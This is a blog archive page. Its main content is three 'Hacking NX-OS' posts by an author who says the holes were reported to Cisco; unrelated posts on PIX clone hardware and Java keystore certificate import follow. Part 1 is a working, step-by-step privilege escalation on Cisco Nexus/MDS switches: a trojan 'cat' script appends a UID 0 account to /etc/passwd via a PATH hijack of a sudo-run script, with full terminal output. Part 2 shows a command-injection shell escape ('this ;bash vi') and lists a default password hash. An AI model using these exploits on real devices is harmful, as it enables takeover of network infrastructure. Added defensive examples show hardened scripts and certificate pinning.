Hacking NX-OS Part 3

Some notes from when I first started hacking away at NX-OS in 2011:

The underlying Nexus operating system is MontaVista Linux, formerly called Hard Hat Linux (an embedded distribution derived from Red Hat Linux); the uname output in Part 2 shows a 2.4.20 MontaVista kernel.  I can tell you that there are numerous ways to attack these boxes.  Some that I have found:

  1. PATH not properly set in shell scripts
  2. Input not properly sanity-checked in scripts
  3. IFS together with PATH is exploitable
  4. gdbserver runs as root, which lets you kill any process, including securityd
  5. The binaries are for the most part stripped, so there is no symbol information; I plan to eventually reconstruct the symbol table using some tools.  Combined with gdb, that would give you the ability to call any function you want as root.
  6. Many processes run as root (via /etc/sudoers); it's very sloppy
  7. I have found at least 5 ways to get shell access.
  8. gdb could (theoretically) be used to overflow the stack in a number of functions to run arbitrary shellcode.  I haven't done this because it's tedious, but it should work.  The underlying security problem is that you can use gdb to connect remotely in the first place.
  9. At least one serious problem is the ability to crash a Nexus remotely via CDP; I don't believe this is fixed yet.

Productive evening.  I was able to get shell access on a 5k, 7k, 1000v, and MDS; that is, from the CLI I was able to get to an actual bash shell.  Oddly, this required different exploits on the MDS than on the 5k/7k/1000v.  As far as I know these are not known to Cisco.  It's not really a serious issue since you have to have access to the box anyway.  I only tried as admin, but it's likely to work from any user level.

I did not post every method I was able to obtain root with, nor did I post the straightforwardly malicious methods such as constructing a special CDP packet that will take NX-OS down every time (at least it used to).  If you have found any interesting things in NX-OS, please let me know!

gdb

The gdb binary is visible via the which command.  You can do "sh processes" to see all processes, then use "gdb <process id>" to attach gdb to one of them and run it as a server.

Then from your workstation you can connect to that gdb process by starting gdb and issuing "target remote x.x.x.x:yyyyy", where x.x.x.x is the IP address of the MDS and yyyyy is the port gdb says it is listening on (starting at 10001).  Nothing in that exchange authenticates the client: whoever can reach the port gets a debugger attached to a root-owned process.  From there you can use gdb to do things like stack smashing and other hacks.  These are advanced topics beyond what I am willing to write here, but trivial for those who know security and gdb.

I have found many security holes in the shell programs and can pass things from the CLI that crash the system.  Yes, most of these work in older versions of SAN-OS as well as NX-OS.


Posted in Cisco, Network Technology, Nexus, NX-OS

Hacking NX-OS Part 2

You can see in my previous article that I used the "bash" command.  In later NX-OS versions this was not possible.  After rooting the box, I spent a lot of time learning about all of the shell scripts and binaries on the filesystem, and I continued to hack at them.

What became my "go-to" command was "this".  I think "this" was an undocumented command, but once you had access to the filesystem you could see it was there.

The most common hack I would do was:

this ;bash vi

and then use :shell from within vi, which spawns the shell named by $SHELL.  This gives you a shell; you can look around and do whatever you like.

When spawning shells from within NX-OS this way, you may not end up with an interactive shell: the commands run, but their output is not attached to your terminal.  Redirect each command's output to the pty your session is on (/dev/pts/0 below; check with tty or who if yours differs) to see it:


df > /dev/pts/0
Filesystem           1k-blocks      Used Available Use% Mounted on
/dev/pssblkdrv           59493       214     56207   1% /data_store
none                    409600    158696    250904  39% /isan
none                    102400      164    102236   1% /var/tmp
none                    153600        0    153600   0% /var/sysmgr
none                    307200    25748    281452   9% /var/sysmgr/ftp
none                    204800     3936    200864   2% /dev/shm
none                     61440        8     61432   1% /volatile
none                      2048         0      2048   0% /debug
/dev/hd-cfg0             19564      1145     17409   7% /mnt/cfg/0
/dev/hd-cfg1             19317      1145     17175   7% /mnt/cfg/1
/dev/hd-pss              19580      2826     15743  16% /mnt/pss
/dev/hd-bootflash       181724     94174     78168  55% /bootflash
127.1.2.2:/mnt/cf/partner   186683    13960    163085   8% /modflash_2-1

id > /dev/pts/0
uid=2002(admin) gid=503(network-admin) groups=503(network-admin)

uname -a > /dev/pts/0
Linux MDS4 2.4.20_mvl31-cpci735 #1 Wed Dec 16 15:50:36 PST 2009 i686 unknown

cat /etc/passwd > /dev/pts/0
root:*:0:0:root:/root:/isanboot/bin/nobash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/usr/sbin:
sys:*:3:3:sys:/dev:
ftp:*:15:14:ftp:/var/ftp:/isanboot/bin/nobash
ftpuser:UvdRSOzORvz9o:99:14:ftpuser:/var/ftp:/isanboot/bin/nobash
nobody:*:65534:65534:nobody:/home:/bin/sh
admin:x:2002:503::/var/home/admin:/isan/bin/vsh_perm

Posted in Cisco, Network Technology, Nexus, NX-OS

Hacking NX-OS Part 1

Some of you may know me as a sage hacker from the mid 80s to the early 90s.  Although, if you met me after 1994, most of you probably don't know that about me at all.  It was a previous life.  Sufficient time has passed since I informed Cisco about numerous security vulnerabilities in older versions of NX-OS that I can now make this post.  I have no idea if these are even still relevant in newer versions.  I hack stuff, and I move on.  I was quite involved in NX-OS years ago as it was based on SAN-OS, an OS I became intimately familiar with while getting my CCIE Storage.  Nowadays I focus on advanced software engineering and doing anything on a beach!  You may wish to read my articles:

Deconstructing Cisco NX-OS Part 1: Exploding Kickstart
Deconstructing Cisco NX-OS Part 2: Exploding the System Image


A walk through hacking NX-OS:

We log in as normal.

login: admin
Password:
Last login: Fri Mar 25 07:25:34 UTC 2011 on ttyS0
Last login: Fri Mar 25 07:41:04 on ttyS0
Cisco NX-OS Software
Copyright (c) 2002-2010, Cisco Systems, Inc. All rights reserved.
switch#

You can see we can run bash and look at our environment, specifically our PWD and PATH (note also the LD_PRELOAD entry, and that EUID is 2002, not 0):

switch# bash set
% Warning, couldn't set default directory, Using '/' instead
BASH=/bin/sh
BASH_ARGC=()
BASH_ARGV=()
BASH_EXECUTION_STRING=set
BASH_LINENO=()
BASH_SOURCE=()
BASH_VERSINFO=([0]="3" [1]="2" [2]="33" [3]="1" [4]="release" [5]="i586-wrs-linux-gnu")
BASH_VERSION='3.2.33(1)-release'
CLIC_LEVEL=0
COLUMNS=80
CURR_PRIV_LEVEL=-1
DIRSTACK=()
EUID=2002
GROUPS=()
HOME=/var/home/admin
HOSTNAME='(none)'
HOSTTYPE=i586
IFS='   '
LD_PRELOAD=/isan/lib/libcli_sandbox.so
LINES=24
LOGNAME=admin
MACHTYPE=i586-wrs-linux-gnu
MAIL=/var/mail/admin
OPTERR=1
OPTIND=1
OSTYPE=linux-gnu
PATH=/sbin:/usr/sbin:/isan/bin:/isanboot/bin:/usr/local/bin:/bin:/usr/bin
POSIXLY_CORRECT=y
PPID=5305
PS4='+ '
PWD=/
SHELL=/bin/sh
SHELLOPTS=braceexpand:hashall:interactive-comments:posix
SHLVL=1
SYSMGR_CARDSTATE=1
SYSMGR_RUNNING_CFG_DIR=/dev/shm
SYSMGR_SLOT_NUM=0
SYSMGR_SYNC_CFG_DIR=/mnt/pss
SYSMGR_SYSTEM_FILES_DIR=/
SYSMGR_VDC_ID=1
SYSMGR_VDC_SRV_TYPE=50
TERM=vt100
TMOUT=0
UID=2002
VSH_EXEC_VERBOSE=0
VSH_PWD=/bootflash
_=sh

We can view /etc/passwd; it's the normal NX-OS /etc/passwd, with the root user locked out (no password hash), etc.  Note the adminbackup entry, though: a second UID 0 account whose shell is /bin/bash.

switch# bash cat /etc/passwd
% Warning, couldn't set default directory, Using '/' instead
root:*:0:0:root:/root:/isanboot/bin/nobash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/usr/sbin:
sys:*:3:3:sys:/dev:
ftp:*:15:14:ftp:/var/ftp:/isanboot/bin/nobash
ftpuser:UvdRSOzORvz9o:99:14:ftpuser:/var/ftp:/isanboot/bin/nobash
nobody:*:65534:65534:nobody:/home:/bin/sh
__eemuser:*:101:100:eemuser:/var/home/__eemuser:/isanboot/bin/nobash
adminbackup:x:0:0::/var/home/adminbackup:/bin/bash
admin:x:2002:503::/var/home/admin:/isan/bin/vsh_perm

Let's create a script.  We have write access to /tmp, and the ftpuser hash UvdRSOzORvz9o in /etc/passwd corresponds to the known default ftpuser password "nbv123", so we can reuse that hash for a new UID 0 account.  The script is named cat so that a privileged script which calls cat by bare name will pick it up once "." is first in PATH:

switch# bash echo "#!/bin/bash" > /tmp/cat
% Warning, couldn't set default directory, Using '/' instead
switch# bash echo "echo toor:UvdRSOzORvz9o:0:0:root:/root:/bin/bash >> /etc/passwd" >> /tmp/cat
% Warning, couldn't set default directory, Using '/' instead
switch# bash cat /tmp/cat
% Warning, couldn't set default directory, Using '/' instead
#!/bin/bash
echo toor:UvdRSOzORvz9o:0:0:root:/root:/bin/bash >> /etc/passwd

Set the file to be executable:

switch# bash chmod 755 /tmp/cat
% Warning, couldn't set default directory, Using '/' instead
switch# bash ls -al /tmp/cat
% Warning, couldn't set default directory, Using '/' instead
-rwxr-xr-x 1 admin network-admin 76 Mar 25 07:29 /tmp/cat

Make sure we can manipulate PATH and put our CWD "." as the first entry.  A new shell is spawned for every "bash" command, so PATH has to be set in the same invocation as the program we execute:

switch# bash cd /tmp;PATH=.:$PATH;set
% Warning, couldn't set default directory, Using '/' instead
BASH=/bin/sh
BASH_ARGC=()
BASH_ARGV=()
BASH_EXECUTION_STRING='cd /tmp;PATH=.:$PATH;set'
BASH_LINENO=()
BASH_SOURCE=()
BASH_VERSINFO=([0]="3" [1]="2" [2]="33" [3]="1" [4]="release" [5]="i586-wrs-linux-gnu")
BASH_VERSION='3.2.33(1)-release'
CLIC_LEVEL=0
COLUMNS=80
CURR_PRIV_LEVEL=-1
DIRSTACK=()
EUID=2002
GROUPS=()
HOME=/var/home/admin
HOSTNAME='(none)'
HOSTTYPE=i586
IFS='   '
LD_PRELOAD=/isan/lib/libcli_sandbox.so
LINES=24
LOGNAME=admin
MACHTYPE=i586-wrs-linux-gnu
MAIL=/var/mail/admin
OLDPWD=/
OPTERR=1
OPTIND=1
OSTYPE=linux-gnu
PATH=.:/sbin:/usr/sbin:/isan/bin:/isanboot/bin:/usr/local/bin:/bin:/usr/bin
PIPESTATUS=([0]=”0″)
POSIXLY_CORRECT=y
PPID=5305
PS4='+ '
PWD=/tmp
SHELL=/bin/sh
SHELLOPTS=braceexpand:hashall:interactive-comments:posix
SHLVL=1
SYSMGR_CARDSTATE=1
SYSMGR_RUNNING_CFG_DIR=/dev/shm
SYSMGR_SYNC_CFG_DIR=/mnt/pss
SYSMGR_SYSTEM_FILES_DIR=/
SYSMGR_VDC_ID=1
SYSMGR_VDC_SRV_TYPE=50
TERM=vt100
TMOUT=0
UID=2002
VSH_EXEC_VERBOSE=0
VSH_PWD=/bootflash
_=

Check our current id:

switch# bash id
% Warning, couldn't set default directory, Using '/' instead
uid=2002(admin) gid=503(network-admin) groups=503(network-admin)

I can't post this command as it would not be good, but you get the point:

switch# bash cd /tmp;PATH=.:$PATH;set;sudo /isan/bin/perf-cmd.sh
% Warning, couldn't set default directory, Using '/' instead
BASH=/bin/sh
BASH_ARGC=()
BASH_EXECUTION_STRING='cd /tmp;PATH=.:$PATH;set;sudo /isan/bin/perf-cmd.sh'
BASH_LINENO=()
BASH_SOURCE=()
BASH_VERSINFO=([0]="3" [1]="2" [2]="33" [3]="1" [4]="release" [5]="i586-wrs-linux-gnu")
BASH_VERSION='3.2.33(1)-release'
CLIC_LEVEL=0
CURR_PRIV_LEVEL=-1
DIRSTACK=()
EUID=2002
GROUPS=()
HOME=/var/home/admin
HOSTNAME='(none)'
HOSTTYPE=i586
IFS='   '
LD_PRELOAD=/isan/lib/libcli_sandbox.so
LINES=24
LOGNAME=admin
MACHTYPE=i586-wrs-linux-gnu
MAIL=/var/mail/admin
OLDPWD=/
OPTERR=1
OSTYPE=linux-gnu
PATH=.:/sbin:/usr/sbin:/isan/bin:/isanboot/bin:/usr/local/bin:/bin:/usr/bin
PIPESTATUS=([0]=”0″)
POSIXLY_CORRECT=y
PPID=5305
PWD=/tmp
SHELL=/bin/sh
SHELLOPTS=braceexpand:hashall:interactive-comments:posix
SHLVL=1
SYSMGR_CARDSTATE=1
SYSMGR_RUNNING_CFG_DIR=/dev/shm
SYSMGR_SLOT_NUM=0
SYSMGR_SYNC_CFG_DIR=/mnt/pss
SYSMGR_SYSTEM_FILES_DIR=/
SYSMGR_VDC_ID=1
SYSMGR_VDC_SRV_TYPE=50
TERM=vt100
TMOUT=0
UID=2002
VSH_EXEC_VERBOSE=0
VSH_PWD=/bootflash
_=

Check /etc/passwd:

switch# bash cat /etc/passwd
% Warning, couldn't set default directory, Using '/' instead
root:*:0:0:root:/root:/isanboot/bin/nobash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/usr/sbin:
sys:*:3:3:sys:/dev:
ftp:*:15:14:ftp:/var/ftp:/isanboot/bin/nobash
ftpuser:UvdRSOzORvz9o:99:14:ftpuser:/var/ftp:/isanboot/bin/nobash
nobody:*:65534:65534:nobody:/home:/bin/sh
adminbackup:x:0:0::/var/home/adminbackup:/bin/bash
admin:x:2002:503::/var/home/admin:/isan/bin/vsh_perm
toor:UvdRSOzORvz9o:0:0:root:/root:/bin/bash

SUCCESS!

switch# exit
login: toor
Password:
Last login: Fri Mar 25 07:24:46 UTC 2011 on ttyS0
Last login: Fri Mar 25 07:32:34 on ttyS0
root@(none):/root> w
07:32:37 up  1:31,  1 user,  load average: 0.00, 0.01, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
toor     ttyS0    -                 07:32    0.00s  0.00s  0.00s w
root@(none):/root> ls -al
total 12
drwxr-x---  2 root root 100 Mar 25 07:25 .
drwxr-xr-x 35 root root 780 Mar 25 06:01 ..
-rw-------  1 root root  15 Mar 25 07:25 .bash_history
-rw-r--r--  1 root root  15 Jan 13  2009 .bash_logout
-rw-r--r--  1 root root 191 Jan 13  2009 .profile
root@(none):/root> id
uid=0(root) gid=0(root) groups=0(root)
root@(none):/root> w
07:33:28 up  1:32,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
toor     ttyS0    -                 07:32    0.00s  0.00s  0.00s w
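The PATH hijack the walkthrough above relies on, reproduced as an added example that is not code from the original post.  The two privileged scripts are hypothetical stand-ins (the real /isan/bin/perf-cmd.sh is not shown on the page), sudo is left out so the mechanism runs as an ordinary user, and the trojan cat drops a marker file instead of appending a toor line to /etc/passwd.  The hardened stand-in also resets IFS, so it covers item 3 of the Part 3 list as well as item 1:

```shell
#!/bin/sh
# Added example; not code from the original post. The privileged scripts below
# are hypothetical stand-ins: the real /isan/bin/perf-cmd.sh is not shown on the page.
set -eu

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT

# Vulnerable stand-in: inherits PATH (and IFS) from the caller and invokes
# `cat` by bare name, which is what lets the attacker's /tmp/cat run.
cat > "$WORK/vuln-cmd.sh" <<'EOF'
#!/bin/sh
cat /etc/hosts >/dev/null 2>&1 || true
echo "vuln-cmd finished"
EOF

# Hardened stand-in: pins PATH, resets IFS and calls binaries by absolute path,
# so nothing the caller controls decides which `cat` runs.
cat > "$WORK/safe-cmd.sh" <<'EOF'
#!/bin/sh
PATH=/usr/bin:/bin; export PATH
unset IFS
/bin/cat /etc/hosts >/dev/null 2>&1 || true
echo "safe-cmd finished"
EOF
chmod 755 "$WORK/vuln-cmd.sh" "$WORK/safe-cmd.sh"

# The attacker's `cat`, playing the role of /tmp/cat in the post. Instead of
# appending to /etc/passwd it leaves a marker file, then behaves like cat.
mkdir -p "$WORK/attacker"
cat > "$WORK/attacker/cat" <<EOF
#!/bin/sh
echo hijacked > "$WORK/marker"
exec /bin/cat "\$@"
EOF
chmod 755 "$WORK/attacker/cat"

# run_with_hijack <script>: mirrors "cd /tmp;PATH=.:\$PATH;... <script>" from
# the walkthrough (minus sudo) and reports whether the attacker's cat ran.
# Prints "hijacked" or "clean".
run_with_hijack() {
    rm -f "$WORK/marker"
    ( cd "$WORK/attacker" && PATH=".:$PATH" "$1" >/dev/null )
    if [ -f "$WORK/marker" ]; then echo hijacked; else echo clean; fi
}

echo "vulnerable script: $(run_with_hijack "$WORK/vuln-cmd.sh")"   # hijacked
echo "hardened script:   $(run_with_hijack "$WORK/safe-cmd.sh")"   # clean
```

The whole difference is the first two lines of the hardened script: a privileged script that pins PATH and uses absolute paths cannot be steered by the caller's environment, whatever sudo does with it.  Sudo's secure_path option, when set in sudoers, resets PATH before the command runs and would defeat this on its own; the walkthrough shows it was not in force on that NX-OS build.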

Posted in CCIE Routing and Switching, CCIE Storage, Cisco, Network Technology, Nexus, NX-OS

Old frankenpix information

Just posted here to preserve it for posterity.

In the old days, I would make Frankenpix boxes.  These were basically identical to a PIX 520 or LocalDirector 430/416: Cisco PIX/LocalDirector clones built from the following hardware, and they worked great:


MOTHERBOARD:
Intel Motherboard SE440BX-2 $ 100

NETWORK INTERFACE:
Intel Pro100/B 10/100 NIC PRO100/B $ 40
– OR –
Osicom 4 Ethernet Port PCI OLN-2404TX $ 900

ISA FLASH CARD:
16MB ISA Flash Card (PEP) CISCO – $ 700
– OR –
4MB ISA Flash Card (??) ?? $ –?

The difficult part in all of this was acquiring the ISA Flash card, which usually you had to cannibalize out of a dead PIX.


Posted in Uncategorized

Get self-signed certificates to work with Cloud Foundry Integration for Eclipse Plug-In

If you're like me, you use self-signed certificates in your lab environment because it's quick and easy.  In my Pivotal Cloud Foundry lab I generated a self-signed certificate in the Elastic Runtime configuration.  When you have a self-signed certificate you add --skip-ssl-validation to your cf api and cf login commands.

With the latest builds of the Cloud Foundry Integration for Eclipse plug-in, self-signed certificates are a problem.  They generate an error to the effect of:

Caused by: sun.security.validator.ValidatorException: 
    PKIX path building failed: 
    sun.security.provider.certpath.SunCertPathBuilderException: 
    unable to find valid certification path to requested target


It will ask if you wish to ignore this, but regardless the integration fails: it cannot validate your credentials, so you have no Cloud Foundry integration.

I really like the Cloud Foundry integration in Eclipse, so I set off to figure out how to make it work.  Originally I tried an older version of the plug-in, 1.7.3, which appeared to work.  I was using this with PCF 1.4.0.0, which had just been released.  I removed an application, however, and when it did so I believe it removed my apps_manager application, which exists in the system org.  I know this sounds weird, because 1) the plug-in should not be removing the apps_manager service under any circumstances, and 2) even if it wanted to, the credentials I used in Spring Tool Suite did not have the authority to remove an app from the system org.  I did not spend a lot of time looking into this; I just noticed that I removed an application and all of a sudden my developer console was gone.  (Developer Console is now known as Apps Manager.)

To get the integration to work you need to add the self-signed certificate from your PCF to your Java keystore.  It's important to understand which version of Java you're running; you may have several versions installed.  Typically the version in use is defined by $JAVA_HOME, but you'll want to verify which version STS/Eclipse itself is using, or add the certificate to all of your versions.  Keep in mind that anything added to cacerts is trusted by every Java program that runs on that JDK, not just Eclipse; a dedicated truststore handed to the IDE with -Djavax.net.ssl.trustStore in eclipse.ini keeps the new trust confined to the one application that needs it.

I use a Mac, and typically the original Java installed by Apple is in /System/Library/Java/JavaVirtualMachines.  For example, my system has:

nettles:~ bfeeny$ ls /System/Library/Java/JavaVirtualMachines/
1.6.0.jdk

This, however, is not the version I am using.  Later versions, from Oracle for example, are installed in /Library/Java/JavaVirtualMachines:

nettles:~ bfeeny$ ls /Library/Java/JavaVirtualMachines/
jdk1.7.0_76.jdk

This is the one I am using, which can be further verified by looking at $JAVA_HOME:

nettles:~ bfeeny$ echo $JAVA_HOME
/Library/Java/JavaVirtualMachines/jdk1.7.0_76.jdk/Contents/Home

Java stores its trusted certificates in a keystore, which on my system is located at

$JAVA_HOME/jre/lib/security/cacerts

The first thing to do is extract the self-signed certificate from your Cloud Foundry.  An easy way is with openssl, like so (add -servername api.cf.lab.local if a front end that serves several names hands back the wrong certificate without SNI):

nettles:~ bfeeny$ openssl s_client -connect api.cf.lab.local:443 < /dev/null | sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p' > /tmp/public.crt
depth=0 C = US, O = Pivotal, CN = *.cf.lab.local

verify error:num=18:self signed certificate
verify return:1
depth=0 C = US, O = Pivotal, CN = *.cf.lab.local
verify return:1
DONE

We can verify it's there:

nettles:~ bfeeny$ more /tmp/public.crt
-----BEGIN CERTIFICATE-----
[...]
v55p/cNKgZJQ4bcpZ0Jp7Y7P7FzLcp76wAacljnbYGkXdxCsrtpUd/VxtNzOeIBP
dbQQxW6Ph9cvSx/w28AaoU9DeoqZvOTnQu2Rltfn6lBPijWQWTEXltiS1WPCyyd+
2Gnl+acnNerspdnHn1lte4ydDR+uq2hYnCJSrlMXaR5TAp3dpwMxtSHA71zkVS61
VRU/vLLtyz3JzAmhGepZ6m2vt2vMNPNGKxVS0c/odNI=
-----END CERTIFICATE-----

Of course, if you have access to Ops Manager, you can go into the Elastic Runtime tile, look under IPs and Ports, and grab the certificate from there; that is where you created it in the first place.  Two items are listed: the first is the public certificate, which is the one you want, and the second is the private key, which must never leave Ops Manager.  Whether you use openssl or cut and paste, the result should be the same, and comparing the fingerprint of what openssl fetched against what Ops Manager shows is the check that you are trusting your own certificate and not something sitting in the path.

Now import the certificate into the Java keystore:

nettles:~ bfeeny$ sudo keytool -import -alias api.cf.lab.local -keystore $JAVA_HOME/jre/lib/security/cacerts -file /tmp/public.crt
Password: <enter your admin password here>
Enter keystore password:  <default password is changeit>
Owner: CN=*.cf.lab.local, O=Pivotal, C=US
Issuer: CN=*.cf.lab.local, O=Pivotal, C=US
Serial number: fd47803cc1af3192158f65513be978e9747e9c4f
Valid from: Tue Apr 14 21:44:51 EDT 2015 until: Thu Apr 13 21:44:51 EDT 2017
Certificate fingerprints:
MD5:  C4:DA:C3:02:B4:25:FC:A9:1E:A1:FB:3A:E0:F7:B5:AD
SHA1: EB:A4:1E:A5:EA:D4:BE:7A:A3:CD:9B:D4:4D:BF:1F:1C:DD:97:52:ED
SHA256: 12:7C:1E:69:32:D4:28:FE:6B:EE:2A:DE:91:FB:76:5E:A6:1F:29:DA:15:A5:4C:21:E8:4C:73:83:BE:0A:78:77
Signature algorithm name: SHA1withRSA
Version: 3
Extensions:
#1: ObjectId: 2.5.29.17 Criticality=false
SubjectAlternativeName [
 DNSName: *.cf.lab.local
]
Trust this certificate? [no]:  yes
Certificate was added to keystore

After this is done, simply restart Eclipse or Spring Tool Suite, and it should allow you to add a Cloud Foundry instance with no issue.  If you had already added an instance, delete it and re-add it.  Fill out your credentials, and all should validate properly.
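A pinned version of the import, as an added example rather than the author's procedure: it assumes openssl is installed, generates a constructed self-signed certificate in place of the lab's, compares its SHA-256 fingerprint against the value you would read off the Ops Manager tile, and only then imports it into a dedicated truststore (the truststore path and alias are illustrative; keytool is used only if present):

```shell
#!/bin/sh
# Added example; not code from the original post. Assumes openssl is installed.
# keytool is used only if present; truststore path and alias are illustrative.
set -eu
WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT

# fingerprint_of <pem>: SHA-256 fingerprint of the certificate's DER encoding,
# formatted AA:BB:..., the same value keytool shows under "Certificate fingerprints".
fingerprint_of() {
    openssl x509 -in "$1" -noout -fingerprint -sha256 | sed 's/^[^=]*=//' | tr 'a-f' 'A-F'
}

# pin_matches <pem> <expected>: succeed only if the fetched certificate has the
# fingerprint you read from Ops Manager (case-insensitive compare).
pin_matches() {
    [ "$(fingerprint_of "$1")" = "$(printf '%s' "$2" | tr 'a-f' 'A-F')" ]
}

# import_pinned <pem> <expected> <truststore> <alias>: import into a dedicated
# truststore, and only after the pin check passes. Point Eclipse at it with
# -Djavax.net.ssl.trustStore=<truststore> instead of editing the JDK's cacerts.
import_pinned() {
    if ! pin_matches "$1" "$2"; then
        echo "fingerprint mismatch for $4, refusing to trust it" >&2
        return 1
    fi
    if command -v keytool >/dev/null 2>&1; then
        keytool -importcert -noprompt -alias "$4" -file "$1" \
            -keystore "$3" -storepass changeit >/dev/null 2>&1
    fi
}

# Constructed stand-in for the lab certificate: a fresh self-signed wildcard
# cert with the same subject as the one in the post.
CERT="$WORK/public.crt"
openssl req -x509 -newkey rsa:2048 -nodes -days 1 \
    -subj "/C=US/O=Pivotal/CN=*.cf.lab.local" \
    -keyout "$WORK/key.pem" -out "$CERT" >/dev/null 2>&1

# "Expected" value as if copied from Ops Manager, plus a deliberately wrong one
# (every hex digit shifted) standing in for a certificate substituted on the path.
GOOD=$(fingerprint_of "$CERT")
BAD=$(printf '%s' "$GOOD" | tr '0123456789ABCDEF' '123456789ABCDEF0')

import_pinned "$CERT" "$GOOD" "$WORK/cf-truststore.jks" api.cf.lab.local && echo "trusted  $GOOD"
import_pinned "$CERT" "$BAD"  "$WORK/cf-truststore.jks" api.cf.lab.local || echo "rejected $BAD"
```

Handing the IDE that truststore with -Djavax.net.ssl.trustStore=/path/to/cf-truststore.jks under -vmargs in eclipse.ini confines the new trust to Eclipse/STS rather than every program on that JDK; note that the property replaces the default cacerts for that JVM rather than adding to it, so start from a copy of cacerts if the IDE also needs public CAs.  Because the import refuses on a fingerprint mismatch, a certificate swapped in between you and the API endpoint never becomes trusted by accident.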

Update: I passed this onto Pivotal and they have added it to their Knowledge Base!

Posted in Cloud Foundry, Pivotal